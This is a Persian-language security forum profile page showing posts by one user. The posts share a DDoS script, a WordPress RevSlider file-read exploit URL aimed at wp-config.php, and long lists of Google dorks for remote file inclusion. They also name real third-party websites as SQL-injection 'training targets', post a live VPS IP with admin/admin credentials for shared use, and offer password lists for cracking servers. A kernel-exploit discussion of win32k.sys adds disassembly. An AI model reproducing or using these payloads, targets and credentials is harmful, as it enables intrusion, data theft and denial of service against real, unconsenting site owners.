رفتن به مطلب
شما به عنوان یوزر میهمان وارد شده اید. جهت استفاده از تمامی امکانات لطقا وارد حساب کاربری خود شوید.

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Elvat0r

Member
  • تعداد ارسال ها

    67
  • تاریخ عضویت

  • آخرین بازدید

اعتبار در سایت

0 Neutral

1 دنبال کننده

درباره Elvat0r

  • تاریخ تولد ۹۸/۱۰/۱۹

Converted

  • Name
    mahyar
  • Main os
    Kali
  • Programming language
    خیر
  1. با سلام خدمت تمام اعضای انجمن این اسکریپت یکی از اسکریپت های خوب برای حمله دیداس هست. لطفا اسپم ندید سوالی هم داشتین پ.خ اعلام کنید رمز فایل: iran-cyber.net یاحق hulk.rar
  2. Elvat0r

    بررسی فایل Win32k.sys

    در داخل تابع win32k!xxxKENLSProcs() اطلاعاتی که قبلا از کیبرد خوانده شده رو فراخوانی می کرد. این بایت ها در داخل ثباتی به نامه ECX ذخیره میشد. Module: win32k.sys - Module Base: 0xBF800000 و بعد به عنوان یک شاخص در آرایه ای از اشاره گر تابع استفاده میشد: .text:BF8A1F50 movzx ecx, byte ptr [eax-83h] // ECX is attacker-controlled .text:BF8A1F57 push edi .text:BF8A1F58 add eax, 0FFFFFF7Ch .text:BF8A1F5D push eax .text:BF8A1F5E call _aNLSVKFProc[ecx*4] // indexed call in function array آرایه تابع شامل سه تابع است و توسط آرایه ای از مقادیر زیر اطلاعات دریافت می کرد: .data:BF99C4B8 _aNLSVKFProc dd offset [email protected] .data:BF99C4BC dd offset [email protected] .data:BF99C4C0 dd offset [email protected] .data:BF99C4C4 _aVkNumpad db 67h .data:BF99C4C5 db 68h .data:BF99C4C6 db 69h .data:BF99C4C7 db 0FFh .data:BF99C4C8 db 64h .data:BF99C4C9 db 65h .data:BF99C4CA db 66h .data:BF99C4CB db 0FFh .data:BF99C4CC db 61h .data:BF99C4CD db 62h .data:BF99C4CE db 63h .data:BF99C4CF db 60h .data:BF99C4D0 db 6Eh .data:BF99C4D1 db 0 .data:BF99C4D2 db 0 .data:BF99C4D3 db 0 از آنجا که این آدرس را برای کنترل می توان فراهم ساخت، مهاجم می تواند شل کد ring0 در این آدرس قرار بده برای رسیدن به اجرای کد با دسترسی کرنل....
  3. Elvat0r

    Target Trainings

    http://jardineropaisajista.com/store/wp-content/themes/eshop/upload/
  4. Elvat0r

    بررسی فایل Win32k.sys

    مدیربخش اگر میشه موضوع تاپیک رو به : بررسی فایل win32k.sys تغیر بدید
  5. Elvat0r

    بررسی فایل Win32k.sys

    با سلام. داشتم در مورد این فایل تقیق و جست و جو می کردم که به نتایج جالبی رسیدم.... گفتم تاپیکی باز بشه و در این باره صحبت بشه.... یکی از راه هایی که ویروس استاکس نت از اون طریق وارد شد از طریق همین فایل Win32k بودش. این آسیب پذیری در خود این فایل بود که وقتی ویروس اجرا میشد می تونست دسترسی در سطح سیستم بگیره و ادامه ماجرا..... وقتی این فایل لود میشه مقادیر زیر رو همراش فرخوانی می کند: 00 b0982944 bf861cd1 win32k!SetGlobalKeyboardTableInfo 01 b0982958 bf889720 win32k!ChangeForegroundKeyboardTable+0x11c 02 b0982978 bf87580e win32k!xxxSetPKLinThreads+0x37 03 b09829f0 bf875588 win32k!xxxLoadKeyboardLayoutEx+0x395 04 b0982d40 8053d658 win32k!NtUserLoadKeyboardLayoutEx+0x164 05 b0982d40 7c90e514 nt!KiFastCallEntry+0xf8 06 0012fccc 00402347 ntdll!KiFastSystemCallRet وقتی که این توابع فراخوانی شدند ویروس از طریق تابعی که قرمزش کردم دستوراتو می فرسته.. وقتی این کار تمام شد با تابعی دیگه به نام user32!SendUserInput() اطلاعات با هم syn میشن. و سپس این تابع اطلاعات رو می فرسته: win32k!NtUserSendInput() و در نهایت تابع win32k!xxxKENLSProcs() اطلاعات رو پردازش می کرد. ادامه مطلب در روز های اینده ... یاحق
  6. Elvat0r

    عکس های ساخته شده برای تیم

    تشکر فراموش نشه
  7. نحوه ی کارکرد اکسپلویت /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php تعدادی دورک: inurl:wp-content inurl:wp-content/themes/ inurl:wp-content inurl:revslider inurl:wp-content intext:revslider.php inurl:wp-content intext:revslider_front.php inurl:wp-content intext:revslider.php site:il themes/WP-Smartcheck themes/stendhal theme/templates/sliders themes/RoyalOak themes/celestino2 plugins/dnd-shortcodes themes/incrediblewp themes/celestino plugins/meteor-extras themes/bazar themes/cheope themes/aziza
  8. Elvat0r

    عکس های ساخته شده برای تیم

    بنر برای تیم ساختم ببخشید اگه خیلی قشنگ نشد
  9. inurl:/modules/My_eGallery/public/displayCategory.php?basepath= inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path= inurl:/include/new-visitor.inc.php?lvc_include_dir= inurl:/_functions.php?prefix= inurl:/cpcommerce/_functions.php?prefix= inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR= inurl:/modules/agendax/addevent.inc.php?agendax_path= inurl:/ashnews.php?pathtoashnews= inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]= inurl:/pm/lib.inc.php?pm_path= inurl:/b2-tools/gm-2-b2.php?b2inc= inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path= inurl:/modules/agendax/addevent.inc.php?agendax_path= inurl:/includes/include_once.php?include_file= inurl:/e107/e107_handlers/secure_img_render.php?p= inurl:/shoutbox/expanded.php?conf= inurl:/main.php?x= inurl:/myPHPCalendar/admin.php?cal_dir= inurl:/index.php/main.php?x= inurl:/index.php?include= inurl:/index.php?x= inurl:/index.php?open= inurl:/index.php?visualizar= inurl:/template.php?pagina= inurl:/index.php?pagina= inurl:/index.php?inc= inurl:/includes/include_onde.php?include_file= inurl:/index.php?page= inurl:/index.php?pg= inurl:/index.php?show= inurl:/index.php?cat= inurl:/index.php?file= inurl:/db.php?path_local= inurl:/index.php?site= inurl:/htmltonuke.php?filnavn= inurl:/livehelp/inc/pipe.php?HCL_path= inurl:/hcl/inc/pipe.php?HCL_path= inurl:/inc/pipe.php?HCL_path= inurl:/support/faq/inc/pipe.php?HCL_path= inurl:/help/faq/inc/pipe.php?HCL_path= inurl:/helpcenter/inc/pipe.php?HCL_path= inurl:/live-support/inc/pipe.php?HCL_path= inurl:/gnu3/index.php?doc= inurl:/gnu/index.php?doc= inurl:/phpgwapi/setup/tables_update.inc.php?appdir= inurl:/forum/install.php?phpbb_root_dir= inurl:/includes/calendar.php?phpc_root_path= inurl:/includes/setup.php?phpc_root_path= inurl:/inc/authform.inc.php?path_pre= inurl:/include/authform.inc.php?path_pre= inurl:index.php?nic= inurl:index.php?sec= inurl:index.php?content= inurl:index.php?link= inurl:index.php?filename= inurl:index.php?dir= inurl:index.php?document= inurl:index.php?view= inurl:*.php?sel= inurl:*.php?session=&content= inurl:*.php?locate= inurl:*.php?place= inurl:*.php?layout= inurl:*.php?go= inurl:*.php?catch= inurl:*.php?mode= inurl:*.php?name= inurl:*.php?loc= inurl:*.php?f= inurl:*.php?inf= inurl:*.php?pg= inurl:*.php?load= inurl:*.php?naam= allinurl:/index.php?page= site:*.dk allinurl:/index.php?file= site:*.dk INURL OR ALLINURL WITH: /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir= /includes/header.php?systempath= /Gallery/displayCategory.php?basepath= /index.inc.php?PATH_Includes= /ashnews.php?pathtoashnews= /ashheadlines.php?pathtoashnews= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /demo/includes/init.php?user_inc= /jaf/index.php?show= /inc/shows.inc.php?cutepath= /poll/admin/common.inc.php?base_path= /pollvote/pollvote.php?pollname= /sources/post.php?fil_config= /modules/My_eGallery/public/displayCategory.php?basepath= /bb_lib/checkdb.inc.php?libpach= /include/livre_include.php?no_connect=lol&chem_absolu= /index.php?from_market=Y&pageurl= /modules/mod_mainmenu.php?mosConfig_absolute_path= /pivot/modules/module_db.php?pivot_path= /modules/4nAlbum/public/displayCategory.php?basepath= /derniers_commentaires.php?rep= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/coppermine/include/init.inc.php?CPG_M_DIR= /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= /coppermine/themes/maze/theme.php?THEME_DIR= /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]= /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]= /myPHPCalendar/admin.php?cal_dir= /agendax/addevent.inc.php?agendax_path= /modules/mod_mainmenu.php?mosConfig_absolute_path= /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /main.php?page= /default.php?page= /index.php?action= /index1.php?p= /index2.php?x= /index2.php?content= /index.php?conteudo= /index.php?cat= /include/new-visitor.inc.php?lvc_include_dir= /modules/agendax/addevent.inc.php?agendax_path= /shoutbox/expanded.php?conf= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /pivot/modules/module_db.php?pivot_path= /library/editor/editor.php?root= /library/lib.php?root= /e107/e107_handlers/secure_img_render.php?p= /zentrack/index.php?configFile= /main.php?x= /becommunity/community/index.php?pageurl= /GradeMap/index.php?page= /index4.php?body= /side/index.php?side= /main.php?page= /es/index.php?action= /index.php?sec= /index.php?main= /index.php?sec= /index.php?menu= /html/page.php?page= /page.php?view= /index.php?menu= /main.php?view= /index.php?page= /content.php?page= /main.php?page= /index.php?x= /main_site.php?page= /index.php?L2= /content.php?page= /main.php?page= /index.php?x= /main_site.php?page= /index.php?L2= /index.php?show= /tutorials/print.php?page= /index.php?page= /index.php?level= /index.php?file= /index.php?inter_url= /index.php?page= /index2.php?menu= /index.php?level= /index1.php?main= /index1.php?nav= /index1.php?link= /index2.php?page= /index.php?myContent= /index.php?TWC= /index.php?sec= /index1.php?main= /index2.php?page= /index.php?babInstallPath= /main.php?body= /index.php?z= /main.php?view= /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= /index.php?file= /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 1. allinurl:my_egallery site:.org /modules/My_eGallery/public/displayCategory.php?basepath= 2. allinurl:xgallery site:.org /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 3. allinurl:coppermine site:.org /modules/coppermine/themes/default/theme.php?THEME_DIR= 4. allinurl:4nAlbum site:.org /modules/4nAlbum/public/displayCategory.php?basepath= 5. allinurlP:NphpBB2 site:.org /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= 6. allinurl:ihm.php?p= 7. Keyword : "powered by AllMyLinks" /include/footer.inc.php?_AMLconfig[cfg_serverpath]= 8. allinurl:/modules.php?name=allmyguests /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 9. allinurl:/Popper/index.php? /Popper/index.php?childwindow.inc.php?form= 10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php yahoo = by Kietu? v 3.2 /kietu/index.php?kietu[url_hit]= 11. keyword : "Powered by phpBB 2.0.6" /html&highlight=%2527.include($_GET[a]),exit.%2527&a= 12. keyword : "powered by CubeCart 3.0.6" /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 13. keyword : "powered by paBugs 2.0 Beta 3" /class.mysql.php?path_to_bt_dir= 14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php /ashnews.php?pathtoashnews= 15. keyword : /phorum/login.php /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= 16. allinurl:ihm.php?p=* 14. keyword : "powered eyeOs" /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id diganti dengan : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);?&a= 15. allinurl:.php?bodyfile= 16. allinurl:/includes/orderSuccess.inc.php?glob= /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 17. allinurl:forums.html /modules.php?name= 18. allinurl:/default.php?page=home 19. allinurl:/folder.php?id= 20. allinurl:main.php?pagina= /paginedinamiche/main.php?pagina= 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests") /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 22. allinurl:application.php?base_path= /application.php?base_path= 23. allinurlp:hplivehelper /phplivehelper/initiate.php?abs_path= 24. allinurlp:hpnuke /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 25. key word : "powered by Fantastic News v2.1.2" /archive.php?CONFIG[script_path]= 26. keyword: "powered by smartblog" AND inurl:?page=login /index.php?page= 27. allinurl:/forum/ /forum/admin/index.php?inc_conf= 28. keyword:"Powered By FusionPHP" /templates/headline_temp.php?nst_inc= 29. allinurl:shoutbox/expanded.php filetypep:hp /shoutbox/expanded.php?conf= 30. allinurl: /osticket/ /osticket/include/main.php?config[search_disp]=true&include_dir= 31. keyword : "Powered by iUser" /common.php?include_path= 32. allinurl: "static.php?load=" /static.php?load= 33. keyworld : /phpcoin/login.php /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]= 34. keyworld: allinurl:/phpGedview/login.php site: /help_text_vars.php?dir&PGV_BASE_DIRECTORY= 35. allinurl:/folder.php?id= /classes.php?LOCAL_PATH= inurl:"/lire.php?rub=" inurl:"/os/pointer.php?url=" inurl:"folder.php?id=" inurl:"show.php?page=" inurl:"index2.php?DoAction=" inurl:"index.php?canal=" inurl:"index.php?screen=" inurl:"index.php?langc=" inurl:"index.php?Language=" inurl:"view.php?page=" dork: "powered by doodle cart" rfi of this dork: enc/content.php?Home_Path= dork: "Login to Calendar" rfi of this dork: /embed/day.php?path= dork: "powered by EQdkp" rfi of this dork: /includes/dbal.php?eqdkp_root_path= inurl:"template.php?goto=" inurl:"video.php?content=" inurl:"pages.php?page=" inurl:"index1.php?choix=" inurl:"index1.php?menu=" inurl:"index2.php?ascii_seite=" dork: inurl:surveys rfi to this dork: /surveys/survey.inc.php?path= inurl:"index.php?body=" dork: allinurl:adobt sitel rfi to this dork: /classes/adodbt/sql.php?classes_dir= dork: "Powered By ScozNews" rfi to this dork: /sources/functions.php?CONFIG[main_path]= rfi to this dork: /sources/template.php?CONFIG[main_path]= inurl:"kb_constants.php?module_root_path=" dork: allinurl:"mcf.php" rfi to this dork: /mcf.php?content= dork: inurl:"main.php?sayfa=" rfi to this dork: /main.php?sayfa= dork: "MobilePublisherPHP" rfi to this dork: /header.php?abspath= dork: "powered by phpCOIN 1.2.3" rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= allinurl:login.php?dir= inurl:"index.php?go=" inurl:"index1.php?=" inurl:"lib/gore.php?libpath=" inurl:"index2.php?p=" --------------------------------------------------------------------------------
  10. manager/frontinc/prepend.php?_PX_config[manager_path]= forum/addpost_newpoll.php?thispath= ipchat.php?root_path= forum/ubbt.inc.php?thispath= modules/My_eGallery/index.php?basepath= zb41/include/write.php?dir= /zentrack/index.php?configFile= src/album.class.php?config components/com_colorlab/admin.color.php?mosConfig_live_site= com_colorlab sources/lostpw.php?CONFIG[path]= topsites/sources/lostpw.php?CONFIG[path]= toplist/sources/lostpw.php?CONFIG[path]= sources/join.php?CONFIG[path]= topsites/sources/join.php?CONFIG[path]= toplist/sources/join.php?CONFIG[path]= topsite/sources/join.php?CONFIG[path]= manager/frontinc/prepend.php?_PX_config[manager_path]= forum/addpost_newpoll.php?thispath= ipchat.php?root_path= forum/ubbt.inc.php?thispath= modules/My_eGallery/index.php?basepath= zb41/include/write.php?dir= /zentrack/index.php?configFile= src/album.class.php?config components/com_colorlab/admin.color.php?mosConfig_live_site= com_colorlab sources/lostpw.php?CONFIG[path]= topsites/sources/lostpw.php?CONFIG[path]= toplist/sources/lostpw.php?CONFIG[path]= sources/join.php?CONFIG[path]= topsites/sources/join.php?CONFIG[path]= toplist/sources/join.php?CONFIG[path]= topsite/sources/join.php?CONFIG[path]=
  11. Elvat0r

    سرور مجازی رایگان | VPS Free

    سرور لینوکسی 42.112.210.63|admin|admin|Vietnam (VN)|Ha Noi|Hanoi|Unknown رمزو تغیر تدید لطفا همه استفاده کنند
  12. Elvat0r

    User And Password List For Cracking Vps

    پسورد لیست طلایی ایرانی رمزفایل: iran-cyber.net پسوورد لیست طلایی ایرانی.rar
  13. Elvat0r

    User And Password List For Cracking Vps

    یوزر لیست جهانی administrator admin server operator computer system support user remote test manager director root user
  14. Elvat0r

    Target Trainings

    http://www.itb.cnr.it/sturgeon/blast_output.php?ID=cluster_1379_contig_1' and 99 and '1'='1&db=go http://www.scottishweddingsonline.co.uk/index.html?module=products&showcat=376' and 99 and '1'='1&showproduct=1 http://www.equipo.com.br/samson/produtos/detalhes.asp?prod_id=99 http://www.kcinkc.com/beachbruce/db_public/view.php?id=999999.9 union all select 1,2,3,4,5,6,99,8,9,10,11,12,13,14 http://www.noreast.com/postedreports/view.cfm?id=999999.9 union all select 99,2,3,4 http://www.hughes-castell.com.hk/search/results.html?keyword=12835/HI' and 99 and '1'='1&details=1 http://www.brooklyncb6.org/neighborhoods/?a=detail&content_id=99 http://www.leadertread.co.za/products/Milemaster.aspx?CategoryID=31c5c0cd-538b-4c18-aa69-55db0ee3c7ce' or 1=99 and '1'='1&RandomID=5c1a94a4-a0d5-4b0a-a274-baf4ce306f3b&linkPath=3_1&lID=3_1_1 http://mc-customs.com/portfolio.php?galleryid=999999.9 union all select 1,99,3,4 http://www.kult-tour.at/detail.php?inr=149' and 99 and '1'='1&mod=DB&kat=K&skat=N http://www.9ballpool.co.uk/practice_drills/series.html?sid=99 http://www.bebebola.com/i/forum/function.mysql-select-db?tid=999999.9' union all select 1,2,3,4,5,99,7,8 and '0'='0&fid=29
  15. Elvat0r

    Target Trainings

    http://www.itb.cnr.it/sturgeon/blast_output.php?ID=cluster_1379_contig_1' and 99 and '1'='1&db=go http://www.scottishweddingsonline.co.uk/index.html?module=products&showcat=376' and 99 and '1'='1&showproduct=1 http://www.equipo.com.br/samson/produtos/detalhes.asp?prod_id=99 http://www.kcinkc.com/beachbruce/db_public/view.php?id=999999.9 union all select 1,2,3,4,5,6,99,8,9,10,11,12,13,14 http://www.noreast.com/postedreports/view.cfm?id=999999.9 union all select 99,2,3,4 http://www.hughes-castell.com.hk/search/results.html?keyword=12835/HI' and 99 and '1'='1&details=1 http://www.brooklyncb6.org/neighborhoods/?a=detail&content_id=99 http://www.leadertread.co.za/products/Milemaster.aspx?CategoryID=31c5c0cd-538b-4c18-aa69-55db0ee3c7ce' or 1=99 and '1'='1&RandomID=5c1a94a4-a0d5-4b0a-a274-baf4ce306f3b&linkPath=3_1&lID=3_1_1 http://mc-customs.com/portfolio.php?galleryid=999999.9 union all select 1,99,3,4 http://www.kult-tour.at/detail.php?inr=149' and 99 and '1'='1&mod=DB&kat=K&skat=N http://www.9ballpool.co.uk/practice_drills/series.html?sid=99 http://www.bebebola.com/i/forum/function.mysql-select-db?tid=999999.9' union all select 1,2,3,4,5,99,7,8 and '0'='0&fid=29

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...